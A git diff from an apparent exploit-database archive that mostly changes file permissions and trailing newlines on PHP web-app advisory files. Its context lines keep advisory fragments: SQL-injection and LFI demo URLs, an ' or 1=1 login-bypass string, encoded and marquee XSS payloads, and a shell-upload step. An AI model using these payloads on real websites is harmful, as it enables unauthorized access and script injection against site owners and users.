newline at end of file diff --git a/platforms/php/webapps/14084.txt b/platforms/php/webapps/14084.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14085.txt b/platforms/php/webapps/14085.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14086.txt b/platforms/php/webapps/14086.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14089.txt b/platforms/php/webapps/14089.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14094.txt b/platforms/php/webapps/14094.txt old mode 100755 new mode 100644 index d8806dd7d..a63f8c53f --- a/platforms/php/webapps/14094.txt +++ b/platforms/php/webapps/14094.txt @@ -23,4 +23,4 @@ DEMO URL : http://server/path/index.php?mod=products&cat=[sqli] ############################################################################################################### # 0day no more -# Sid3^effects \ No newline at end of file +# Sid3^effects \ No newline at end of file diff --git a/platforms/php/webapps/14095.txt b/platforms/php/webapps/14095.txt old mode 100755 new mode 100644 index 1df96d1e0..eba48ae25 --- a/platforms/php/webapps/14095.txt +++ b/platforms/php/webapps/14095.txt @@ -34,4 +34,4 @@ DEMO URL : http://server/products/2daybizemail/php121_editname.php?uid=[sqli] ############################################################################################################### # 0day no more -# Sid3^effects \ No newline at end of file +# Sid3^effects \ No newline at end of file diff --git a/platforms/php/webapps/14096.html b/platforms/php/webapps/14096.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14106.txt b/platforms/php/webapps/14106.txt old mode 100755 new mode 100644 index 82a990c9c..d7bafe938 --- a/platforms/php/webapps/14106.txt +++ b/platforms/php/webapps/14106.txt @@ -40,4 +40,4 @@ Peace [~] GreetZ To [~] -The Invisible , Dr.Html , Mehdiz , Mr-Yasen , The S3r!0uS , Dr.Solo , ProF.Sellim & All Morrocans H4xorz \ No newline at end of file +The Invisible , Dr.Html , Mehdiz , Mr-Yasen , The S3r!0uS , Dr.Solo , ProF.Sellim & All Morrocans H4xorz \ No newline at end of file diff --git a/platforms/php/webapps/14107.txt b/platforms/php/webapps/14107.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14109.txt b/platforms/php/webapps/14109.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14110.txt b/platforms/php/webapps/14110.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14111.txt b/platforms/php/webapps/14111.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14112.txt b/platforms/php/webapps/14112.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14123.txt b/platforms/php/webapps/14123.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14126.txt b/platforms/php/webapps/14126.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14127.txt b/platforms/php/webapps/14127.txt old mode 100755 new mode 100644 index bca8de38e..0f9d811a0 --- a/platforms/php/webapps/14127.txt +++ b/platforms/php/webapps/14127.txt @@ -32,4 +32,4 @@ DEMO URL : http://server/component/joomanager/?view=itemslist&catid=[sqli] ############################################################################################################### # 0day no more -# Sid3^effects \ No newline at end of file +# Sid3^effects \ No newline at end of file diff --git a/platforms/php/webapps/14128.txt b/platforms/php/webapps/14128.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14132.html b/platforms/php/webapps/14132.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14144.txt b/platforms/php/webapps/14144.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14145.txt b/platforms/php/webapps/14145.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14147.txt b/platforms/php/webapps/14147.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14154.txt b/platforms/php/webapps/14154.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14160.txt b/platforms/php/webapps/14160.txt old mode 100755 new mode 100644 index 2de37cac5..107b3ebfe --- a/platforms/php/webapps/14160.txt +++ b/platforms/php/webapps/14160.txt @@ -22,6 +22,4 @@ Content-Length: 146 op=add&userid=consultor1&password_changed=true&PASS1=xxxx&PASS2=xxxx&desc=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&access_rights=reportonly #################################################################################### -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14160.pdf - - \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14160.pdf \ No newline at end of file diff --git a/platforms/php/webapps/14162.txt b/platforms/php/webapps/14162.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14163.txt b/platforms/php/webapps/14163.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14164.txt b/platforms/php/webapps/14164.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14165.txt b/platforms/php/webapps/14165.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14166.txt b/platforms/php/webapps/14166.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14170.txt b/platforms/php/webapps/14170.txt old mode 100755 new mode 100644 index 738b2be52..a177b103b --- a/platforms/php/webapps/14170.txt +++ b/platforms/php/webapps/14170.txt @@ -23,4 +23,4 @@ DEMO URL :http://server/showinphoto.php?pid=[LFI] ############################################################################################################### # 0day no more -# Sid3^effects \ No newline at end of file +# Sid3^effects \ No newline at end of file diff --git a/platforms/php/webapps/14171.txt b/platforms/php/webapps/14171.txt old mode 100755 new mode 100644 index a5cbf9b53..055f91ac1 --- a/platforms/php/webapps/14171.txt +++ b/platforms/php/webapps/14171.txt @@ -23,4 +23,4 @@ DEMO URL :http://server/iphone/showphoto.php?pid=[LFI] ############################################################################################################### # 0day no more -# Sid3^effects \ No newline at end of file +# Sid3^effects \ No newline at end of file diff --git a/platforms/php/webapps/14172.txt b/platforms/php/webapps/14172.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14176.c b/platforms/php/webapps/14176.c old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14183.txt b/platforms/php/webapps/14183.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14184.txt b/platforms/php/webapps/14184.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14186.txt b/platforms/php/webapps/14186.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14187.txt b/platforms/php/webapps/14187.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14188.html b/platforms/php/webapps/14188.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14193.c b/platforms/php/webapps/14193.c old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14196.txt b/platforms/php/webapps/14196.txt old mode 100755 new mode 100644 index 05c26c818..957c0d148 --- a/platforms/php/webapps/14196.txt +++ b/platforms/php/webapps/14196.txt @@ -32,4 +32,4 @@ Steap 4: Now check your ads :P DEMO URL :http://server/js/index.php?option=com_socialads&view=adsummary&Itemid=94&adid=23 ############################################################################################################### # 0day no more -# Sid3^effects \ No newline at end of file +# Sid3^effects \ No newline at end of file diff --git a/platforms/php/webapps/14197.txt b/platforms/php/webapps/14197.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14198.txt b/platforms/php/webapps/14198.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14199.txt b/platforms/php/webapps/14199.txt old mode 100755 new mode 100644 index fce0c0db0..38cb5e0b4 --- a/platforms/php/webapps/14199.txt +++ b/platforms/php/webapps/14199.txt @@ -67,5 +67,4 @@ Put [SQL CODE] >>> Proude To Be A Kashmiri+Pakistani<<< >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>Bug discovered : 4 July 2010 - \ No newline at end of file +>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>Bug discovered : 4 July 2010 \ No newline at end of file diff --git a/platforms/php/webapps/14201.txt b/platforms/php/webapps/14201.txt old mode 100755 new mode 100644 index b7e37546d..f2c3adcac --- a/platforms/php/webapps/14201.txt +++ b/platforms/php/webapps/14201.txt @@ -16,4 +16,4 @@ Sql Injection: http://localhost/[path]/list.php?id=161' (SQL İnj.) -######################################################################################## \ No newline at end of file +######################################################################################## \ No newline at end of file diff --git a/platforms/php/webapps/14202.txt b/platforms/php/webapps/14202.txt old mode 100755 new mode 100644 index 1de43db05..d8721fbc3 --- a/platforms/php/webapps/14202.txt +++ b/platforms/php/webapps/14202.txt @@ -20,4 +20,4 @@ http://server/search_results/?action=[LFI] ############################################################################################################### # 0day no more -# Sid3^effects \ No newline at end of file +# Sid3^effects \ No newline at end of file diff --git a/platforms/php/webapps/14203.txt b/platforms/php/webapps/14203.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14204.txt b/platforms/php/webapps/14204.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14205.txt b/platforms/php/webapps/14205.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14206.txt b/platforms/php/webapps/14206.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14207.txt b/platforms/php/webapps/14207.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14208.txt b/platforms/php/webapps/14208.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14209.txt b/platforms/php/webapps/14209.txt old mode 100755 new mode 100644 index d91055fe8..332c95c86 --- a/platforms/php/webapps/14209.txt +++ b/platforms/php/webapps/14209.txt @@ -37,4 +37,4 @@ DEMO URL :http://server/index.php?option=com_content&view=category&layout=blog&i ############################################################################################################### # 0day no more -# Sid3^effects \ No newline at end of file +# Sid3^effects \ No newline at end of file diff --git a/platforms/php/webapps/14210.txt b/platforms/php/webapps/14210.txt old mode 100755 new mode 100644 index dd2c4d4bd..4f34cc275 --- a/platforms/php/webapps/14210.txt +++ b/platforms/php/webapps/14210.txt @@ -28,4 +28,4 @@ DEMO URL :http://server/index.php?option=com_addressbook&view=contact&Itemid=[Bs ############################################################################################################### # 0day no more -# Sid3^effects \ No newline at end of file +# Sid3^effects \ No newline at end of file diff --git a/platforms/php/webapps/14211.txt b/platforms/php/webapps/14211.txt old mode 100755 new mode 100644 index 93c07b9e8..ec9a685e3 --- a/platforms/php/webapps/14211.txt +++ b/platforms/php/webapps/14211.txt @@ -26,4 +26,4 @@ DEMO URL :http://server/joomla15/index.php?option=com_ninjamonials&view=display& ############################################################################################################### # 0day no more -# Sid3^effects \ No newline at end of file +# Sid3^effects \ No newline at end of file diff --git a/platforms/php/webapps/14213.txt b/platforms/php/webapps/14213.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14214.txt b/platforms/php/webapps/14214.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14217.txt b/platforms/php/webapps/14217.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14223.txt b/platforms/php/webapps/14223.txt old mode 100755 new mode 100644 index ac2cb7970..9fad345b7 --- a/platforms/php/webapps/14223.txt +++ b/platforms/php/webapps/14223.txt @@ -27,4 +27,4 @@ Xploit: Auth Bypass use ' or 1=1 or ''=' in both username and password :D ############################################################################################################### # 0day no more -# Sid3^effects \ No newline at end of file +# Sid3^effects \ No newline at end of file diff --git a/platforms/php/webapps/14224.txt b/platforms/php/webapps/14224.txt old mode 100755 new mode 100644 index 14b7c7714..9181b90a8 --- a/platforms/php/webapps/14224.txt +++ b/platforms/php/webapps/14224.txt @@ -26,4 +26,4 @@ Use ' or 1=1 or ''=' in both username and password :D ############################################################################################################### # 0day no more -# Sid3^effects \ No newline at end of file +# Sid3^effects \ No newline at end of file diff --git a/platforms/php/webapps/14225.txt b/platforms/php/webapps/14225.txt old mode 100755 new mode 100644 index fe5ac4ad2..bd740d352 --- a/platforms/php/webapps/14225.txt +++ b/platforms/php/webapps/14225.txt @@ -21,4 +21,4 @@ DEMO URL 1:http://server/Realtor_Web/search.php?c=[sqli] ############################################################################################################### # 0day no more -# Sid3^effects \ No newline at end of file +# Sid3^effects \ No newline at end of file diff --git a/platforms/php/webapps/14226.txt b/platforms/php/webapps/14226.txt old mode 100755 new mode 100644 index 968243617..4fb909870 --- a/platforms/php/webapps/14226.txt +++ b/platforms/php/webapps/14226.txt @@ -25,4 +25,4 @@ DEMO URL 2:http://server/Home_Classifieds/articlesdetails.php?id=[sqli] ############################################################################################################### # 0day no more -# Sid3^effects \ No newline at end of file +# Sid3^effects \ No newline at end of file diff --git a/platforms/php/webapps/14227.txt b/platforms/php/webapps/14227.txt old mode 100755 new mode 100644 index ec4ffb48b..6fdd74929 --- a/platforms/php/webapps/14227.txt +++ b/platforms/php/webapps/14227.txt @@ -23,4 +23,4 @@ DEMO URL 1:http://server/Events_Locator/search.php?c=[sqli] ############################################################################################################### # 0day no more -# Sid3^effects \ No newline at end of file +# Sid3^effects \ No newline at end of file diff --git a/platforms/php/webapps/14228.txt b/platforms/php/webapps/14228.txt old mode 100755 new mode 100644 index c9b5017f3..85012daad --- a/platforms/php/webapps/14228.txt +++ b/platforms/php/webapps/14228.txt @@ -24,4 +24,4 @@ DEMO URL 2:hhttp://server/General_Classifieds/browse.php?pcat=[sqli] ############################################################################################################### # 0day no more -# Sid3^effects \ No newline at end of file +# Sid3^effects \ No newline at end of file diff --git a/platforms/php/webapps/14229.txt b/platforms/php/webapps/14229.txt old mode 100755 new mode 100644 index 43cf00870..5d64e1481 --- a/platforms/php/webapps/14229.txt +++ b/platforms/php/webapps/14229.txt @@ -23,4 +23,4 @@ DEMO URL :http://server/Auto_Classifieds/articlesdetails.php?id=[sqli] ############################################################################################################### # 0day no more -# Sid3^effects \ No newline at end of file +# Sid3^effects \ No newline at end of file diff --git a/platforms/php/webapps/14230.txt b/platforms/php/webapps/14230.txt old mode 100755 new mode 100644 index b4ce29008..a959fa9a1 --- a/platforms/php/webapps/14230.txt +++ b/platforms/php/webapps/14230.txt @@ -30,4 +30,4 @@ Use ' or 1=1 or ''=' in both username and password :) ############################################################################################################### # 0day no more -# Sid3^effects \ No newline at end of file +# Sid3^effects \ No newline at end of file diff --git a/platforms/php/webapps/14232.txt b/platforms/php/webapps/14232.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14233.txt b/platforms/php/webapps/14233.txt old mode 100755 new mode 100644 index 3105f7617..3d5975d86 --- a/platforms/php/webapps/14233.txt +++ b/platforms/php/webapps/14233.txt @@ -25,4 +25,4 @@ DEMO URL :http://server/Auction_Software/confirm.php?id=[sqli] ############################################################################################################### # 0day no more -# Sid3^effects \ No newline at end of file +# Sid3^effects \ No newline at end of file diff --git a/platforms/php/webapps/14237.txt b/platforms/php/webapps/14237.txt old mode 100755 new mode 100644 index c73f70602..33b17efe1 --- a/platforms/php/webapps/14237.txt +++ b/platforms/php/webapps/14237.txt @@ -90,4 +90,4 @@ Digital Security Research Group focuses on enterprise application (ERP) and data posted regularly on our website. Contact: research [at] dsecrg [dot] com -http://www.dsecrg.com \ No newline at end of file +http://www.dsecrg.com \ No newline at end of file diff --git a/platforms/php/webapps/14238.txt b/platforms/php/webapps/14238.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14239.txt b/platforms/php/webapps/14239.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14240.txt b/platforms/php/webapps/14240.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14241.txt b/platforms/php/webapps/14241.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14242.txt b/platforms/php/webapps/14242.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14243.txt b/platforms/php/webapps/14243.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14244.txt b/platforms/php/webapps/14244.txt old mode 100755 new mode 100644 index 8c86f4dd6..033a01cfd --- a/platforms/php/webapps/14244.txt +++ b/platforms/php/webapps/14244.txt @@ -26,4 +26,4 @@ DEMO URL :http://server/index.php?new_a=addalbum&artist_id=[sqli] ############################################################################################################### # 0day no more -# Sid3^effects \ No newline at end of file +# Sid3^effects \ No newline at end of file diff --git a/platforms/php/webapps/14245.txt b/platforms/php/webapps/14245.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14247.txt b/platforms/php/webapps/14247.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14249.txt b/platforms/php/webapps/14249.txt old mode 100755 new mode 100644 index 6eeb87c33..17ceaf35d --- a/platforms/php/webapps/14249.txt +++ b/platforms/php/webapps/14249.txt @@ -18,4 +18,4 @@ DEMO URL :http://www.site.com/index.php?option=com_autartimonial&view=autartimon ############################################################################################################### # 0day no more -# Sid3^effects \ No newline at end of file +# Sid3^effects \ No newline at end of file diff --git a/platforms/php/webapps/14250.txt b/platforms/php/webapps/14250.txt old mode 100755 new mode 100644 index 38c07e2db..a2a062498 --- a/platforms/php/webapps/14250.txt +++ b/platforms/php/webapps/14250.txt @@ -19,4 +19,4 @@ DEMO URL :http://server/index.php?option=com_neorecruit&task=offer_view&id=155&I ############################################################################################################### # 0day no more -# Sid3^effects \ No newline at end of file +# Sid3^effects \ No newline at end of file diff --git a/platforms/php/webapps/14251.txt b/platforms/php/webapps/14251.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14255.txt b/platforms/php/webapps/14255.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14259.txt b/platforms/php/webapps/14259.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14260.txt b/platforms/php/webapps/14260.txt old mode 100755 new mode 100644 index f030009ee..ad32d3122 --- a/platforms/php/webapps/14260.txt +++ b/platforms/php/webapps/14260.txt @@ -32,4 +32,4 @@ Step 3 : Now goto the main page,check the blog section and the url is http://www The attacker can injected evil xss script in the blog section :D ######################################################################################################## # 0day no more -# Sid3^effects \ No newline at end of file +# Sid3^effects \ No newline at end of file diff --git a/platforms/php/webapps/14262.txt b/platforms/php/webapps/14262.txt old mode 100755 new mode 100644 index 406181fce..589f30092 --- a/platforms/php/webapps/14262.txt +++ b/platforms/php/webapps/14262.txt @@ -15,4 +15,4 @@ Xploit :SQli Vulnerability Demo Url :http://server/detail.php?doc_id=[sqli] ####################################################################################################### # 0day no more -# Sid3^effects \ No newline at end of file +# Sid3^effects \ No newline at end of file diff --git a/platforms/php/webapps/14263.txt b/platforms/php/webapps/14263.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14265.txt b/platforms/php/webapps/14265.txt old mode 100755 new mode 100644 index b79daf058..c6f314de2 --- a/platforms/php/webapps/14265.txt +++ b/platforms/php/webapps/14265.txt @@ -13,4 +13,4 @@ Xploit:BSQli Vulnerability Demo Url: http://server/games/gambling/add.html?type=[BSQLi] ######################################################################################################## # 0day no more -# Sid3^effects \ No newline at end of file +# Sid3^effects \ No newline at end of file diff --git a/platforms/php/webapps/14270.txt b/platforms/php/webapps/14270.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14271.txt b/platforms/php/webapps/14271.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14274.txt b/platforms/php/webapps/14274.txt old mode 100755 new mode 100644 index afc95a3b4..5d8dbed8f --- a/platforms/php/webapps/14274.txt +++ b/platforms/php/webapps/14274.txt @@ -17,4 +17,4 @@ Xploit :LFI Vulnerability Demo Url :http://server/component/music/album.html?cid=[LFI]%00 ####################################################################################################### # 0day no more -# Sid3^effects \ No newline at end of file +# Sid3^effects \ No newline at end of file diff --git a/platforms/php/webapps/14277.txt b/platforms/php/webapps/14277.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14278.txt b/platforms/php/webapps/14278.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14279.txt b/platforms/php/webapps/14279.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14280.txt b/platforms/php/webapps/14280.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14289.html b/platforms/php/webapps/14289.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14291.txt b/platforms/php/webapps/14291.txt old mode 100755 new mode 100644 index edbab7627..7cf5da973 --- a/platforms/php/webapps/14291.txt +++ b/platforms/php/webapps/14291.txt @@ -22,4 +22,4 @@ Demo url : http://site.com/ixxo-cart-plus-demo/index.php?p=catalog&parent=[SQLI] ####################################################################################################### # 0day no more -# Sid3^effects \ No newline at end of file +# Sid3^effects \ No newline at end of file diff --git a/platforms/php/webapps/14293.txt b/platforms/php/webapps/14293.txt old mode 100755 new mode 100644 index 3027b9634..68fa8a43d --- a/platforms/php/webapps/14293.txt +++ b/platforms/php/webapps/14293.txt @@ -36,4 +36,4 @@ Demo url : http://website/index.php?option=com_content&view=article&layout=form& 3.Now check your article ####################################################################################################### # 0day no more -# Sid3^effects \ No newline at end of file +# Sid3^effects \ No newline at end of file diff --git a/platforms/php/webapps/14294.txt b/platforms/php/webapps/14294.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14296.txt b/platforms/php/webapps/14296.txt old mode 100755 new mode 100644 index 775715362..5f060495d --- a/platforms/php/webapps/14296.txt +++ b/platforms/php/webapps/14296.txt @@ -40,4 +40,4 @@ Feature List: [+]. SQL-i Vulnerability =+=+=+=+=+=+=+=+=+ -[Exploit]: http://127.0.0.1/path/index.php?option=com_quickfaq&view=category&cid=[Valid Cid]&Itemid= [BSQL-Injection] \ No newline at end of file +[Exploit]: http://127.0.0.1/path/index.php?option=com_quickfaq&view=category&cid=[Valid Cid]&Itemid= [BSQL-Injection] \ No newline at end of file diff --git a/platforms/php/webapps/14299.txt b/platforms/php/webapps/14299.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14306.txt b/platforms/php/webapps/14306.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14308.txt b/platforms/php/webapps/14308.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14310.js b/platforms/php/webapps/14310.js old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14312.txt b/platforms/php/webapps/14312.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14313.txt b/platforms/php/webapps/14313.txt old mode 100755 new mode 100644 index f0ae567e6..7e9f98273 --- a/platforms/php/webapps/14313.txt +++ b/platforms/php/webapps/14313.txt @@ -14,4 +14,4 @@ Xploit: BSQLi Vulnerability DEMO URL : http://server/path/index.php?option=com_myhome&task=4&nidimm=[BSQLi] ####################################################################################################### # 0day no more -# Sid3^effects \ No newline at end of file +# Sid3^effects \ No newline at end of file diff --git a/platforms/php/webapps/14315.txt b/platforms/php/webapps/14315.txt old mode 100755 new mode 100644 index efdc7e61c..f5f6682ef --- a/platforms/php/webapps/14315.txt +++ b/platforms/php/webapps/14315.txt @@ -29,4 +29,4 @@ Step 4: your shell is uploaded and now you do ur job ;) ####################################################################################################### # 0day no more -# Sid3^effects \ No newline at end of file +# Sid3^effects \ No newline at end of file diff --git a/platforms/php/webapps/14318.html b/platforms/php/webapps/14318.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14322.txt b/platforms/php/webapps/14322.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14324.txt b/platforms/php/webapps/14324.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14325.txt b/platforms/php/webapps/14325.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14326.txt b/platforms/php/webapps/14326.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14327.txt b/platforms/php/webapps/14327.txt old mode 100755 new mode 100644 index 374212a4f..3c22fb02c --- a/platforms/php/webapps/14327.txt +++ b/platforms/php/webapps/14327.txt @@ -29,4 +29,4 @@ Step 4 : Once done,go check your evil recipe ;).The location would be ######################################################################################################## # 0day no more -# Sid3^effects \ No newline at end of file +# Sid3^effects \ No newline at end of file diff --git a/platforms/php/webapps/14328.html b/platforms/php/webapps/14328.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14329.html b/platforms/php/webapps/14329.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14330.html b/platforms/php/webapps/14330.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14331.html b/platforms/php/webapps/14331.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14333.html b/platforms/php/webapps/14333.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14335.txt b/platforms/php/webapps/14335.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14336.txt b/platforms/php/webapps/14336.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14337.html b/platforms/php/webapps/14337.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14338.html b/platforms/php/webapps/14338.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14341.html b/platforms/php/webapps/14341.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14342.html b/platforms/php/webapps/14342.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14350.txt b/platforms/php/webapps/14350.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14351.txt b/platforms/php/webapps/14351.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14353.html b/platforms/php/webapps/14353.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14354.txt b/platforms/php/webapps/14354.txt old mode 100755 new mode 100644 index 74aea557f..786c7c878 --- a/platforms/php/webapps/14354.txt +++ b/platforms/php/webapps/14354.txt @@ -30,4 +30,4 @@ Demo URL : http://server/ajarticlev3/?do=article&action=show ####################################################################################################### # 0day no more -# Sid3^effects \ No newline at end of file +# Sid3^effects \ No newline at end of file diff --git a/platforms/php/webapps/14356.txt b/platforms/php/webapps/14356.txt old mode 100755 new mode 100644 index 875fd62d9..c52e18594 --- a/platforms/php/webapps/14356.txt +++ b/platforms/php/webapps/14356.txt @@ -29,4 +29,4 @@ Demo url : http://server/usercp/profile/edit/ ----> Go here and insert your x ####################################################################################################### # 0day no more -# Sid3^effects \ No newline at end of file +# Sid3^effects \ No newline at end of file diff --git a/platforms/php/webapps/14357.txt b/platforms/php/webapps/14357.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14359.html b/platforms/php/webapps/14359.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14362.txt b/platforms/php/webapps/14362.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14363.txt b/platforms/php/webapps/14363.txt old mode 100755 new mode 100644 index 31f722603..6b4bba5aa --- a/platforms/php/webapps/14363.txt +++ b/platforms/php/webapps/14363.txt @@ -29,4 +29,4 @@ Attack pattern : ">><marquee><h1>XSS3d By Sid3^effects</h1><marquee> ####################################################################################################### # 0day no more -# Sid3^effects \ No newline at end of file +# Sid3^effects \ No newline at end of file diff --git a/platforms/php/webapps/14364.html b/platforms/php/webapps/14364.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14365.txt b/platforms/php/webapps/14365.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14366.txt b/platforms/php/webapps/14366.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14368.txt b/platforms/php/webapps/14368.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14370.txt b/platforms/php/webapps/14370.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14371.txt b/platforms/php/webapps/14371.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14374.txt b/platforms/php/webapps/14374.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14375.txt b/platforms/php/webapps/14375.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14376.txt b/platforms/php/webapps/14376.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14377.txt b/platforms/php/webapps/14377.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14378.txt b/platforms/php/webapps/14378.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14381.txt b/platforms/php/webapps/14381.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14383.txt b/platforms/php/webapps/14383.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14389.txt b/platforms/php/webapps/14389.txt old mode 100755 new mode 100644 index 7e2158b5a..640ffb212 --- a/platforms/php/webapps/14389.txt +++ b/platforms/php/webapps/14389.txt @@ -28,4 +28,4 @@ DEMO URL :http://site.com/project_3_marqueeh1xss3d-by-sid3effectsh1marque.html ####################################################################################################### # 0day no more -# Sid3^effects \ No newline at end of file +# Sid3^effects \ No newline at end of file diff --git a/platforms/php/webapps/14390.txt b/platforms/php/webapps/14390.txt old mode 100755 new mode 100644 index ab184be65..2efd00b5b --- a/platforms/php/webapps/14390.txt +++ b/platforms/php/webapps/14390.txt @@ -25,4 +25,4 @@ Step 4 : Now check the main sites for the projects and you may find your script DEMO URL : http://site.com/all_projects.php ####################################################################################################### # 0day no more -# Sid3^effects \ No newline at end of file +# Sid3^effects \ No newline at end of file diff --git a/platforms/php/webapps/14391.txt b/platforms/php/webapps/14391.txt old mode 100755 new mode 100644 index 604bdcc64..c949fe696 --- a/platforms/php/webapps/14391.txt +++ b/platforms/php/webapps/14391.txt @@ -29,4 +29,4 @@ DEMO URL :http://autos.site.com/autos/account-autos.html My demo :http://autos.site.com/autos/Acura/MDX/Acura-MDX-marquee-h1-XSS3d-By-Sid3-effects-h1-marqu-a6.html ####################################################################################################### # 0day no more -# Sid3^effects \ No newline at end of file +# Sid3^effects \ No newline at end of file diff --git a/platforms/php/webapps/14392.txt b/platforms/php/webapps/14392.txt old mode 100755 new mode 100644 index 2962bdd18..4c6f7406e --- a/platforms/php/webapps/14392.txt +++ b/platforms/php/webapps/14392.txt @@ -15,4 +15,4 @@ Xploit:SQli Vulnerability http://[site]/supportsuite/index.php?_m=news&_a=viewnews&newsid=[Sqli] ####################################################################################################### # 0day no more -# Sid3^effects \ No newline at end 